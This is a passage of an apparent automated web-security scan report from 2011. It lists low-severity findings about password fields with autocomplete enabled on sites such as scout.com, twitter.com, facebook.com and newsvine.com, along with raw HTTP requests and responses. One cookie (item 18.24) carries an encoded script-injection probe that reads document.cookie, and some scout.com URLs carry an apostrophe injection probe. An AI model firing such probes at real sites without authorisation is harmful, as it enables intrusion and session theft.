GET /a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88 HTTP/1.1
Host: secure.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.5.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:50:54 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.10. https://secure.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The page contains a form with the following action URL:

https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011

The form contains the following password fields with autocomplete enabled:

Password
Password2

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//recruiting.scout.com/a.z%3Fs%3D73%26p%3D9%26c%3D4%26pid%3D88%27%26yr%3D2011 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://recruiting.scout.com/a.z?s=73&p=9&c=4&pid=88'&yr=2011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:06 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2frecruiting.scout.com%2fa.z%3fs%3d73%26p%3d9%26c%3d4%26pid%3d88'%26yr%3d2011"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.11. https://secure.scout.com/a.z previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://secure.scout.com
Path:	/a.z

Issue detail

The page contains a form with the following action URL:

https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2fwww.scout.com%2fa.z%3fs%3d143%26p%3d3%26blipid%3d14568

The form contains the following password fields with autocomplete enabled:

Password
Password2

Request

GET /a.z?s=143&p=5&c=3&redirecturl=http%3A//www.scout.com/a.z%3Fs%3D143%26p%3D3%26blipid%3D14568 HTTP/1.1
Host: secure.scout.com
Connection: keep-alive
Referer: http://www.scout.com/a.z?s=143&p=3&blipid=14568
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.5.9.1296350713426

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:25:17 GMT
Server: Microsoft-IIS/6.0
Server: Secure2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7;IE=EmulateIE8
...[SNIP]...
</TR><FORM NAME="create" METHOD=post ACTION="https://secure.scout.com/a.z?s=143&p=5&c=3&redirecturl=http%3a%2f%2fwww.scout.com%2fa.z%3fs%3d143%26p%3d3%26blipid%3d14568"><TR>
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password TYPE=password TABINDEX=10 SIZE=20 MAXLENGTH=20 VALUE=""><br />
...[SNIP]...
<br /><INPUT STYLE="font-family: Courier New" NAME=Password2 TYPE=password TABINDEX=11 SIZE=20 MAXLENGTH=20 VALUE=""></TD>
...[SNIP]...

18.12. http://spacefellowship.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://spacefellowship.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://spacefellowship.com/login?redirect=%2F

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: spacefellowship.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.13. http://twitter.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.14. http://twitter.com/HelenASPopkin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/HelenASPopkin

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /HelenASPopkin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.15. http://twitter.com/MichaelWann previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/MichaelWann

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /MichaelWann HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.16. http://twitter.com/windabenedetti previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/windabenedetti

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /windabenedetti HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.17. http://twitter.com/wjrothman previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://twitter.com
Path:	/wjrothman

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.18. https://twitter.com/ToddKenreck previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://twitter.com
Path:	/ToddKenreck

Issue detail

The page contains a form with the following action URL:

https://twitter.com/sessions

The form contains the following password field with autocomplete enabled:

session[password]

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.19. http://www.dailygrail.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.dailygrail.com/content/Daily-Grail-Frontpage?destination=node%2F7931

The form contains the following password field with autocomplete enabled:

pass

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.20. http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.delish.com
Path:	/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips

Issue detail

The page contains a form with the following action URL:

https://login.delish.com/registration/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.21. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.delish.com
Path:	/food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The page contains a form with the following action URL:

https://login.delish.com/registration/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001 HTTP/1.1
Host: www.delish.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.22. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:52:38 GMT
Content-Length: 11463

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.23. http://www.facebook.com/HelenASPopkin previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/HelenASPopkin

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

18.24. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /plugins/likebox.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 30 Jan 2011 01:22:21 GMT
Content-Length: 11156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

18.25. http://www.facebook.com/sharer.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/sharer.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1&display=popup

The form contains the following password field with autocomplete enabled:

pass

Request

Response

18.26. http://www.facebook.com/todd.kenreck previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/todd.kenreck

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

18.27. http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.foxsportsarizona.com
Path:	/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

Issue detail

The page contains a form with the following action URL:

http://www.foxsportsarizona.com/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html

The form contains the following password field with autocomplete enabled:

login_password

Request

Response

18.28. http://www.newsvine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.29. http://www.newsvine.com/_tools/user/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_tools/user/login

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_tools/user/login

The form contains the following password field with autocomplete enabled:

pass

Request

GET /_tools/user/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.30. https://www.newsvine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

Response

18.31. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.32. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/Login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.33. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/fullRegister

The form contains the following password fields with autocomplete enabled:

pass
confirm

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.34. http://www.polls.newsvine.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

18.35. http://www.polls.newsvine.com/_nv/cms/backyard/greenhouse previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/backyard/greenhouse

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/backyard/greenhouse HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

18.36. http://www.polls.newsvine.com/_nv/cms/backyard/tools previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/backyard/tools

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/backyard/tools HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:58 GMT
Content-Length: 20666
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.37. http://www.polls.newsvine.com/_nv/cms/help/faq previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/help/faq

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/help/faq HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:41 GMT
Content-Length: 19412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.38. http://www.polls.newsvine.com/_nv/cms/info/codeOfHonor previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/codeOfHonor

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/codeOfHonor HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:48 GMT
Content-Length: 22633
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.39. http://www.polls.newsvine.com/_nv/cms/info/companyInfo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/companyInfo

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/companyInfo HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:51 GMT
Content-Length: 19220
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.40. http://www.polls.newsvine.com/_nv/cms/info/contact previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/contact

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/contact HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:43 GMT
Content-Length: 20175
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
<input type="hidden" name="redirect" value="https://www.newsvine.com/_nv/accounts/login" />
...[SNIP]...
<div class="passwd">Password: <input type="password" name="password" value="" /></div>
...[SNIP]...

18.41. http://www.polls.newsvine.com/_nv/cms/info/copyrightPolicy previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/_nv/cms/info/copyrightPolicy

Issue detail

The page contains a form with the following action URL:

https://www.newsvine.com/_nv/api/accounts/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /_nv/cms/info/copyrightPolicy HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:16:55 GMT
Content-Length: 21217
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="Content-Ty
...[SNIP]...
</h3>
<form method="post" action="https://www.newsvine.com/_nv/api/accounts/login">
